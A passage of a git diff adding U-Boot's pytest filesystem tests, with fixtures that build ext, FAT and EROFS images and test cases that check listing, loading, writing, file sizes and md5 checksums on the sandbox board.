%s/test6/dir2/existing' % mount_dir, shell=True) + new_rand_file('%s/test6/existing' % mount_dir) + md5val['test6'] = file_hash('%s/test6/existing' % mount_dir) + + # Test Case 7 + check_call('mkdir -p %s/test7/dir1' % mount_dir, shell=True) + check_call('mkdir -p %s/test7/dir2/dir1' % mount_dir, shell=True) + new_rand_file('%s/test7/dir2/dir1/file1' % mount_dir) + md5val['test7'] = file_hash('%s/test7/dir2/dir1/file1' % mount_dir) + + # Test Case 8 + check_call('mkdir -p %s/test8/dir1' % mount_dir, shell=True) + new_rand_file('%s/test8/dir1/file1' % mount_dir) + md5val['test8'] = file_hash('%s/test8/dir1/file1' % mount_dir) + + # Test Case 9 + check_call('mkdir -p %s/test9/dir1/nested/inner' % mount_dir, shell=True) + new_rand_file('%s/test9/dir1/nested/inner/file1' % mount_dir) + + # Test Case 10 + check_call('mkdir -p %s/test10' % mount_dir, shell=True) + new_rand_file('%s/test10/file1' % mount_dir) + md5val['test10'] = file_hash('%s/test10/file1' % mount_dir) + + # Test Case 11 + check_call('mkdir -p %s/test11/dir1' % mount_dir, shell=True) + new_rand_file('%s/test11/dir1/file1' % mount_dir) + md5val['test11'] = file_hash('%s/test11/dir1/file1' % mount_dir) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', mount_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. 
{}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for fat test +# +@pytest.fixture() +def fs_obj_fat(request, u_boot_config): + """Set up a file system to be used in fat test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for fat test, i.e. a duplet of file system type and + volume file name. + """ + + # the maximum size of a FAT12 filesystem resulting in 4084 clusters + MAX_FAT12_SIZE = 261695 * 1024 + + # the minimum size of a FAT16 filesystem that can be created with + # mkfs.vfat resulting in 4087 clusters + MIN_FAT16_SIZE = 8208 * 1024 + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + fs_size = MAX_FAT12_SIZE if fs_type == 'fat12' else MIN_FAT16_SIZE + + try: + # the volume size depends on the filesystem + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, fs_size, f'{fs_size}', None, 1024) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) diff --git a/test/py/tests/test_fs/fstest_defs.py b/test/py/tests/test_fs/fstest_defs.py new file mode 100644 index 00000000000..35b2bb65183 --- /dev/null +++ b/test/py/tests/test_fs/fstest_defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +# $MIN_FILE is the name of the 20KB file in the file system image +MIN_FILE='testfile' + +# $SMALL_FILE is the name of the 1MB file in the file system image +SMALL_FILE='1MB.file' + +# $MEDIUM_FILE is the name of the 10MB file in the file system image +MEDIUM_FILE='10MB.file' + +# $BIG_FILE is the name of the 2.5GB file in the file system image +BIG_FILE='2.5GB.file' + +ADDR=0x01000008 +LENGTH=0x00100000 diff --git a/test/py/tests/test_fs/fstest_helpers.py b/test/py/tests/test_fs/fstest_helpers.py new file mode 100644 index 00000000000..c1447b4d43e --- /dev/null +++ b/test/py/tests/test_fs/fstest_helpers.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: JJ Hiblot <jjhiblot@ti.com> +# + +from subprocess import check_call, CalledProcessError + +def assert_fs_integrity(fs_type, fs_img): + try: + if fs_type == 'ext4': + check_call('fsck.ext4 -n -f %s' % fs_img, shell=True) + elif fs_type in ['fat12', 'fat16', 'fat32']: + check_call('fsck.fat -n %s' % fs_img, shell=True) + except CalledProcessError: + raise diff --git a/test/py/tests/test_fs/test_basic.py b/test/py/tests/test_fs/test_basic.py new file mode 100644 index 00000000000..5a02348bb94 --- /dev/null +++ b/test/py/tests/test_fs/test_basic.py @@ -0,0 +1,289 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Basic Test + +""" +This test verifies basic read/write operation on file system. 
+""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsBasic(object): + def test_fs1(self, ubman, fs_obj_basic): + """ + Test Case 1 - ls command, listing a root directory and invalid directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 1a - ls'): + # Test Case 1 - ls + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sls host 0:0' % fs_type]) + assert(re.search('2621440000 *%s' % BIG_FILE, ''.join(output))) + assert(re.search('1048576 *%s' % SMALL_FILE, ''.join(output))) + + with ubman.log.section('Test Case 1b - ls (invalid dir)'): + # In addition, test with a nonexistent directory to see if we crash. + output = ubman.run_command( + '%sls host 0:0 invalid_d' % fs_type) + assert('' == output) + + def test_fs2(self, ubman, fs_obj_basic): + """ + Test Case 2 - size command for a small file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 2a - size (small)'): + # 1MB is 0x0010 0000 + # Test Case 2a - size of small file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + with ubman.log.section('Test Case 2b - size (/../<file>)'): + # Test Case 2b - size of small file via a path using '..' + output = ubman.run_command_list([ + '%ssize host 0:0 /SUBDIR/../%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs3(self, ubman, fs_obj_basic): + """ + Test Case 3 - size command for a large file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 3 - size (large)'): + # 2.5GB (1024*1024*2500) is 0x9C40 0000 + # Test Case 3 - size of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, BIG_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=9c400000' in ''.join(output)) + + def test_fs4(self, ubman, fs_obj_basic): + """ + Test Case 4 - load a small file, 1MB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 4 - load (small)'): + # Test Case 4a - Read full 1MB of small file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + def test_fs5(self, ubman, fs_obj_basic): + """ + Test Case 5 - load, reading first 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 5 - load (first 1MB)'): + # Test Case 5a - First 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x0' % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 5b - First 1MB of big file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + def test_fs6(self, ubman, fs_obj_basic): + """ + Test Case 6 - load, reading last 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test 
Case 6 - load (last 1MB)'): + # fails for ext as no offset support + # Test Case 6a - Last 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x9c300000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 6b - Last 1MB of big file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + + def test_fs7(self, ubman, fs_obj_basic): + """ + Test Case 7 - load, 1MB from the last 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 7 - load (last 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 7a - One from the last 1MB chunk of 2GB + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff00000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 7b - One from the last 1MB chunk of 2GB + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + + def test_fs8(self, ubman, fs_obj_basic): + """ + Test Case 8 - load, reading first 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 8 - load (first 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 8a - One from the start 1MB chunk from 2GB + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x80000000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 8b - One from the start 1MB chunk from 2GB + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[4] in ''.join(output)) + + def test_fs9(self, ubman, fs_obj_basic): + """ + Test Case 9 - load, 1MB crossing 2GB boundary + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 9 - load (crossing 2GB boundary)'): + # fails for ext as no offset support + # Test Case 9a - One 1MB chunk crossing the 2GB boundary + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff80000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 9b - One 1MB chunk crossing the 2GB boundary + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[5] in ''.join(output)) + + def test_fs10(self, ubman, fs_obj_basic): + """ + Test Case 10 - load, reading beyond file end'): + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 10 - load (beyond file end)'): + # Generic failure case + # Test Case 10 - 2MB chunk from the last 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s 0x00200000 0x9c300000' + % (fs_type, ADDR, BIG_FILE), + 'printenv filesize', + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs11(self, ubman, fs_obj_basic): + """ + Test Case 11 - write' + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 11 - write'): + # Read 1MB from small file + # Write it back to test the writes + # Test Case 11a - Check that the write succeeded + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 
'%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /%s.w $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 11b - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.w' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs12(self, ubman, fs_obj_basic): + """ + Test Case 12 - write to "." directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 12 - write (".")'): + # Next test case checks writing a file whose dirent + # is the first in the block, which is always true for "." + # The write should fail, but the lookup should work + # Test Case 12 - Check directory traversal + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /. 0x10' % (fs_type, ADDR)]) + assert('Unable to write' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs13(self, ubman, fs_obj_basic): + """ + Test Case 13 - write to a file with "/./<filename>" + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 13 - write ("./<file>")'): + # Read 1MB from small file + # Write it via "same directory", i.e. "." dirent + # Test Case 13a - Check directory traversal + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /./%s2 $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 13b - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /./%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + # Test Case 13c - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_erofs.py b/test/py/tests/test_fs/test_erofs.py new file mode 100644 index 00000000000..a2bb6b505f2 --- /dev/null +++ b/test/py/tests/test_fs/test_erofs.py @@ -0,0 +1,220 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Huang Jianan <jnhuang95@gmail.com> +# Author: Huang Jianan <jnhuang95@gmail.com> + +import os +import pytest +import shutil +import subprocess + +EROFS_SRC_DIR = 'erofs_src_dir' +EROFS_IMAGE_NAME = 'erofs.img' + +def generate_file(name, size): + """ + Generates a file filled with 'x'. + """ + content = 'x' * size + file = open(name, 'w') + file.write(content) + file.close() + +def make_erofs_image(build_dir): + """ + Makes the EROFS images used for the test. 
+
+    The image is generated at build_dir with the following structure:
+    erofs_src_dir/
+    ├── f4096
+    ├── f7812
+    ├── subdir/
+    │   └── subdir-file
+    ├── symdir -> subdir
+    └── symfile -> f7812
+    """
+    root = os.path.join(build_dir, EROFS_SRC_DIR)
+    os.makedirs(root)
+
+    # 4096: uncompressed file
+    generate_file(os.path.join(root, 'f4096'), 4096)
+
+    # 7812: compressed file
+    generate_file(os.path.join(root, 'f7812'), 7812)
+
+    # sub-directory with a single file inside
+    subdir_path = os.path.join(root, 'subdir')
+    os.makedirs(subdir_path)
+    generate_file(os.path.join(subdir_path, 'subdir-file'), 100)
+
+    # symlinks
+    os.symlink('subdir', os.path.join(root, 'symdir'))
+    os.symlink('f7812', os.path.join(root, 'symfile'))
+
+    input_path = os.path.join(build_dir, EROFS_SRC_DIR)
+    output_path = os.path.join(build_dir, EROFS_IMAGE_NAME)
+    args = ' '.join([output_path, input_path])
+    subprocess.run(['mkfs.erofs -zlz4 ' + args], shell=True, check=True,
+                   stdout=subprocess.DEVNULL)
+
+def clean_erofs_image(build_dir):
+    """
+    Deletes the image and src_dir at build_dir.
+    """
+    path = os.path.join(build_dir, EROFS_SRC_DIR)
+    shutil.rmtree(path)
+    image_path = os.path.join(build_dir, EROFS_IMAGE_NAME)
+    os.remove(image_path)
+
+def erofs_ls_at_root(ubman):
+    """
+    Test that all the present files and directories are listed.
+    """
+    no_slash = ubman.run_command('erofsls host 0')
+    slash = ubman.run_command('erofsls host 0 /')
+    assert no_slash == slash
+
+    expected_lines = ['./', '../', '4096 f4096', '7812 f7812', 'subdir/',
+                      '<SYM> symdir', '<SYM> symfile', '4 file(s), 3 dir(s)']
+
+    output = ubman.run_command('erofsls host 0')
+    for line in expected_lines:
+        assert line in output
+
+def erofs_ls_at_subdir(ubman):
+    """
+    Test if the path resolution works.
+    """
+    expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)']
+    output = ubman.run_command('erofsls host 0 subdir')
+    for line in expected_lines:
+        assert line in output
+
+def erofs_ls_at_symlink(ubman):
+    """
+    Test if the symbolic link's target resolution works.
+    """
+    output = ubman.run_command('erofsls host 0 symdir')
+    output_subdir = ubman.run_command('erofsls host 0 subdir')
+    assert output == output_subdir
+
+    expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)']
+    for line in expected_lines:
+        assert line in output
+
+def erofs_ls_at_non_existent_dir(ubman):
+    """
+    Test that the EROFS support does not crash when given a nonexistent
+    directory.
+    """
+    out_non_existent = ubman.run_command('erofsls host 0 fff')
+    out_not_dir = ubman.run_command('erofsls host 0 f1000')
+    assert out_non_existent == out_not_dir
+    assert '' in out_non_existent
+
+def erofs_load_files(ubman, files, sizes, address):
+    """
+    Loads files and asserts their checksums.
+ """ + build_dir = ubman.config.build_dir + for (file, size) in zip(files, sizes): + out = ubman.run_command('erofsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # calculate u-boot file's checksum + out = ubman.run_command('md5sum {} {}'.format(address, hex(int(size)))) + u_boot_checksum = out.split()[-1] + + # calculate original file's checksum + original_file_path = os.path.join(build_dir, EROFS_SRC_DIR + '/' + file) + out = subprocess.run(['md5sum ' + original_file_path], shell=True, check=True, + capture_output=True, text=True) + original_checksum = out.stdout.split()[0] + + # compare checksum + assert u_boot_checksum == original_checksum + +def erofs_load_files_at_root(ubman): + """ + Test load file from the root directory. + """ + files = ['f4096', 'f7812'] + sizes = ['4096', '7812'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_files_at_subdir(ubman): + """ + Test load file from the subdirectory. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_files_at_symlink(ubman): + """ + Test load file from the symlink. + """ + files = ['symfile'] + sizes = ['7812'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_non_existent_file(ubman): + """ + Test if the EROFS support will crash when load a nonexistent file. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = ubman.run_command('erofsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def erofs_run_all_tests(ubman): + """ + Runs all test cases. + """ + erofs_ls_at_root(ubman) + erofs_ls_at_subdir(ubman) + erofs_ls_at_symlink(ubman) + erofs_ls_at_non_existent_dir(ubman) + erofs_load_files_at_root(ubman) + erofs_load_files_at_subdir(ubman) + erofs_load_files_at_symlink(ubman) + erofs_load_non_existent_file(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_erofs') +@pytest.mark.buildconfigspec('fs_erofs') +@pytest.mark.requiredtool('mkfs.erofs') +@pytest.mark.requiredtool('md5sum') + +def test_erofs(ubman): + """ + Executes the erofs test suite. + """ + build_dir = ubman.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. 
+ ubman.restart_uboot() + + try: + # setup test environment + make_erofs_image(build_dir) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + ubman.run_command('host bind 0 {}'.format(image_path)) + # run all tests + erofs_run_all_tests(ubman) + except: + clean_erofs_image(build_dir) + raise AssertionError + + # clean test environment + clean_erofs_image(build_dir) diff --git a/test/py/tests/test_fs/test_ext.py b/test/py/tests/test_fs/test_ext.py new file mode 100644 index 00000000000..9c213f2da55 --- /dev/null +++ b/test/py/tests/test_fs/test_ext.py @@ -0,0 +1,355 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Exntented Test + +""" +This test verifies extended write operation on file system. +""" + +import os.path +import pytest +import re +from subprocess import check_output +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +PLAIN_FILE='abcdefgh.txt' +MANGLE_FILE='abcdefghi.txt' + +def str2fat(long_filename): + splitext = os.path.splitext(long_filename.upper()) + name = splitext[0] + ext = splitext[1][1:] + if len(name) > 8: + name = '%s~1' % name[:6] + return '%-8s %s' % (name, ext) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsExt(object): + def test_fs_ext1(self, ubman, fs_obj_ext): + """ + Test Case 1 - write a file with absolute path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 1 - write with abs path'): + # Test Case 1a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w1 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 1b - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w1' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext2(self, ubman, fs_obj_ext): + """ + Test Case 2 - write to a file with relative path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 2 - write with rel path'): + # Test Case 2a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x dir1/%s.w2 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 2b - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x dir1/%s.w2' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext3(self, ubman, fs_obj_ext): + """ + Test Case 3 - write to a file with invalid path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 3 - write with invalid path'): + # Test Case 3 - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/none/%s.w3 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1/none/' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def 
test_fs_ext4(self, ubman, fs_obj_ext): + """ + Test Case 4 - write at non-zero offset, enlarging file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 4 - write at non-zero offset, enlarging file size'): + # Test Case 4a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w4 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w4 $filesize 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 4b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w4' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=6400' in ''.join(output)) + + # Test Case 4c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w4' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext5(self, ubman, fs_obj_ext): + """ + Test Case 5 - write at non-zero offset, shrinking file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 5 - write at non-zero offset, shrinking file size'): + # Test Case 5a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w5 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w5 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('5120 bytes written' in output) + + # Test Case 5b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w5' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=2800' in ''.join(output)) + + # Test Case 5c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w5' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext6(self, ubman, fs_obj_ext): + """ + Test Case 6 - write nothing at the start, truncating to zero + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 6 - write nothing at the start, truncating to zero'): + # Test Case 6a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w6 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w6 0 0' + % (fs_type, ADDR, MIN_FILE)) + assert('0 bytes written' in output) + + # Test Case 6b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w6' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=0' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext7(self, ubman, fs_obj_ext): + """ + Test Case 7 - write at the end (append) + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 7 - write at the end (append)'): + # Test Case 7a - Check if command successfully returned + 
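+ # The second write below appends at offset $filesize (the 20480-byte/0x5000
+ # load size), so the file should grow to 2 * 0x5000 = 0xa000 bytes,
+ # which Test Case 7b checks via 'filesize=a000'.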
output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w7 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w7 $filesize $filesize' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 7b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w7' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=a000' in ''.join(output)) + + # Test Case 7c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w7' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext8(self, ubman, fs_obj_ext): + """ + Test Case 8 - write at offset beyond the end of file + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 8 - write beyond the end'): + # Test Case 8a - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w8 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w8 0x1400 %x' + % (fs_type, ADDR, MIN_FILE, 0x100000 + 0x1400)) + assert('Unable to write file /dir1' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext9(self, ubman, fs_obj_ext): + """ + Test Case 9 - write to a non-existing file at non-zero offset + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 9 - write to non-existing file with non-zero offset'): + # Test Case 9a - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w9 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext10(self, ubman, fs_obj_ext): + """ + 'Test Case 10 - create/delete as many directories under root directory + as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 10 - create/delete (many)'): + # Test Case 10a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. 
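+ # With 66 entries the directory needs 66 * 32 = 2112 bytes, which no longer
+ # fits in a single 2048-byte cluster, so the directory has to grow by one
+ # cluster, which is the condition this test case exercises.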
